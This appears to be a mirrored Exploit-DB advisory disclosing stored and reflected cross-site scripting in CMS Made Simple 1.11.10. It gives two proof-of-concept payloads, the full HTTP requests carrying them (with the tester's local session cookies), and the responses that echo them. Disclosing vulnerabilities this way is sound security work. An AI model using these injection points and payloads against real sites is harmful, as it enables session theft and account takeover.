CMS Made Simple 1.11.10 – Multiple Cross-Site Scripting Vulnerabilities

• Exploit Database
• 10 阅读

• 作者： Blessen Thomas
  日期： 2014-04-03
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/32668/

• Exploit Title : CMS Made Simple 1.11.10 Multiple XSS Vulnerability
  
  Google dork : N/A
  
  Date : 02/04/2014
  
  Exploit Author : Blessen Thomas
  
  Vendor Homepage : http://www.cmsmadesimple.org/
  
  Software Link : N/A
  
  Version : 1.11.10
  
  Tested on : Windows 7 hosted in WAMP server
  
  Type of Application :open source content management system,
  
  
  
  
  
  Stored XSS :
  
  Login to the admin portal and access search functionality
  
  http://localhost/cmsmadesimple-1.11.10-full/index.php
  
  Here the " search " parameter is vulnerable to stored xss.
  
  Payload :
  
  '">><marquee><img src=x onerror=confirm(1)
  
  request:
  
  POST http://localhost/cmsmadesimple-1.11.10-full/ HTTP/1.1
  
  Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0)
  Gecko/20100101 Firefox/28.0 Accept:
  text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer:
  http://localhost/cmsmadesimple-1.11.10-full/index.php Cookie:
  _sx_=3ee623ee0900c03b; cms_admin_user_id=1;
  cms_passhash=fcb88b76587f0658cd2481a004312918;
  CMSSESSIDd508249c=qijlp266idmf9sjc51bai74lg7;
  PHPSESSID=5fvasiledip329l0bhr2ulb1j0;
  CMSSESSID7a29d042=qv3lpa3fpdflsmqac1icp5cfe7 Connection: keep-alive
  Content-Type: application/x-www-form-urlencoded Content-Length: 153
  
  mact=Search%2Ccntnt01%2Cdosearch%2C0&cntnt01returnid=15&cntnt01searchinput=%27%22%3E%3E%3Cmarquee%3E%3Cimg+src%3Dx+onerror%3Dconfirm%281%29&submit=Submit
  
  response :
  
  
  <div id="search" class="core-float-right">
  '">><marquee><img src=x onerror=confirm(1)
  </div>
   <a href="http://localhost/cmsmadesimple-1.11.10-full/"
  title="Home Page, shortcut key=1" >CMS Made Simple Site</a>
  </div>
  
  
  
  
  
  Reflected XSS :
  
  Login to the admin portal and click the "My Preferences" and click "My
  account" section.
  
  Here , the "email address" parameter is vulnerable to reflected XSS.
  
  Payload :
  
  "";</script><script>alert(0)</script><"
  
  request :
  
  POST
  http://127.0.0.1/cmsmadesimple-1.11.10-full/admin/myaccount.php?_sx_=1c8c76366630b299
  HTTP/1.1
  
  Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0)
  Gecko/20100101 Firefox/28.0 Accept:
  text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer:
  http://127.0.0.1/cmsmadesimple-1.11.10-full/admin/myaccount.php?_sx_=1c8c76366630b299Cookie:
  _sx_=1c8c76366630b299; cms_admin_user_id=1;
  cms_passhash=fcb88b76587f0658cd2481a004312918;
  CMSSESSIDd508249c=71ougg9mi3ikiilatfc0851no5 Connection: keep-alive
  Content-Type: application/x-www-form-urlencoded Content-Length: 103
  
  active_tab=maintab&user=test&password=&passwordagain=&firstname=&lastname=&email="";</script><script>alert(0)</script><"&submit_account=Submit
  
  
  response :
  
  </aside>	 </div>	 <!-- end sidebar //-->	 <!-- start main
  -->	 <div id="oe_mainarea" class="cf">	 <aside class="message
  pageerrorcontainer" role="alert"><p>The email address entered is
  invalid: "";</script><script>alert(0)</script><"</p></aside><article
  role="main" class="content-inner"><header class="pageheader
  cf"><h1>My&nbsp;Account</h1><script type="text/javascript">